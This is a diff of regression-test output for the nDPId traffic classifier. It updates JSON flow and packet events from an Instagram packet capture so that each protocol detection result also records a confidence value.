+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -209,14 +211,14 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
